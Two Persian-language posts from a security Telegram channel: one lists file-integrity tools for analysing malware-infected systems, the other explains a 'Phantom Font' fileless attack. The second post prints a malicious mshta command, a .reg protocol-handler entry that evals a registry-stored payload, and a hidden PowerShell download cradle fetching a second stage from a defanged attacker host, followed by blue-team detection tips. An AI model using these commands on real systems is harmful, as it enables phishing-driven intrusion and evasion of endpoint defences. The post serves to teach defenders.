🔘تحلیل تغییرات فایل‌ها و فولدرها در سیستم‌های آلوده به Malware

یکی از پیامدهای آلوده شدن سیستم به بدافزار (hashtag#Malware)، امکان ایجاد تغییراتی در فایل‌ها و فولدرهای سیستم توسط کدهای مخرب است. برای تحلیل زنده (Live Analysis) سیستم‌های آلوده، یک روش مؤثر صحت‌سنجی فایل‌ها و فولدرها به کمک ابزارهایی مانند:

🔘 PA File Sight
🔘 Tripwire File Integrity and Change Manager
🔘 Netwrix Auditor

این ابزارها تغییرات ایجادشده را شناسایی می‌کنند و تحلیل دقیقی ارائه می‌دهند.

اگر دسترسی به ابزارهای تخصصی فوق وجود ندارد، ابزار داخلی Windows به نام Sigverif می‌تواند برای بررسی تغییرات در فایل‌های سیستمی مورد استفاده قرار گیرد.


#CyberSecurity #MalwareAnalysis #FileIntegrity #ThreatDetection #WindowsTools #SystemSecurity #Sigverif #Tripwire #NetwrixAuditor #ITSecurity

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

🎯 حمله فونت شبح (Phantom Font Attack): جایی که mshta.exe با رجیستری متحد می‌شود!

یک فونت، یک فایل .reg و ابزار قانونی mshta.exe
و این سه در کنار هم می‌توانند یک حمله Fileless واقعی بسازند که حتی EDRها هم جا بمانند!



🔎 پراسس mshta.exe چیست و چرا باید به آن شک کرد؟

پراسس mshta.exe یک ابزار رسمی ویندوز است که برای اجرای فایل‌های hta (HTML Application) طراحی شده است.
این فایل‌ها می‌توانند شامل JavaScript و VBScript باشند و mshta.exe آنها را با سطح دسترسی کاربر اجرا می‌کند.

📌 محل پیش‌فرض:
C:\\Windows\\System32\\mshta.exe



چرا مهاجمان عاشق mshta.exe هستند؟

✅ به‌صورت پیش‌فرض در ویندوز نصب است (Living Off The Land)
✅ اجرای مستقیم اسکریپت حتی از اینترنت یا رجیستری
✅ اغلب در لیست سفید آنتی‌ویروس و EDR قرار دارد
✅ ابزاری برای اجرای حملات Fileless و مخفیانه



📌 نمونه استفاده مخرب:


mshta.exe "javascript​ : new ActiveXObject('WScript[.]Shell').Run('calc.exe');close();"




🧩 مراحل حمله فونت شبح:

1️⃣ طعمه (Phishing)
قربانی ایمیلی با لینک نصب فونت شرکت دریافت می‌کند (مثلاً CorpSans.ttf)
اما به‌جای فونت، یک فایل مشکوک .reg را دانلود می‌کند.

2️⃣ تغییر رجیستری (Registry Trick)
فایل .reg یک Protocol Handler جعلی به نام fontview:// تعریف می‌کند.
و می‌گوید: «اگر fontview://load فراخوانی شد، این دستور mshta را اجرا کن»:


[HKEY_CLASSES_ROOT\\fontview\\shell\\open\\command]
@="mshta.exe \"javascript​:eval(new ActiveXObject('WScript[.]Shell').RegRead('HKCU\\\\Software\\\\PhantomFont\\\\Payload'));window.close();\""


3️⃣ اجرای کد بدون فایل (Fileless Execution)
صفحه وب به fontview://load ریدایرکت می‌شود.
پراسس mshta.exe اجرا می‌شود، مقدار Payload از رجیستری خوانده می‌شود و PowerShell مخفیانه اجرا می‌شود:

javascript
var sh = new ActiveXObject('WScript[.]Shell');
sh[.]Run('powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(\'hxxp://attacker[.]com/stage2.ps1\'))"', 0, false);




🔍 چرا این حمله خطرناک است؟

✅ Fileless → هیچ فایل اجرایی روی دیسک نیست
✅ استفاده از ابزار قانونی ویندوز (mshta.exe)
✅ ذخیره کد در رجیستری → بدون فایل مشکوک
✅ اجرا به‌صورت Stealth (بدون پنجره و هشدار)



🛡 نکات مهم برای Blue Team:

🔸 اجرای mshta.exe باید محدود یا مانیتور شود
🔸 تغییرات در مسیر HKEY_CLASSES_ROOT و Protocol Handlerها را لاگ کنید
🔸 هر اجرای ناگهانی mshta بدون فایل .hta را بررسی کنید
🔸 تحلیل دقیق ترافیک شبکه و DNS برای ارتباط با سرورهای مشکوک



🔐 یک فونت کافی است تا دری به سوی حمله باز شود.
امروز به mshta.exe شک کنید!

#RedTeam #BlueTeam #Malware #Phishing #FilelessAttack #RegistryHacking #mshta #CyberSecurity #WindowsSecurity #ThreatIntel #EDRBYPASS

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer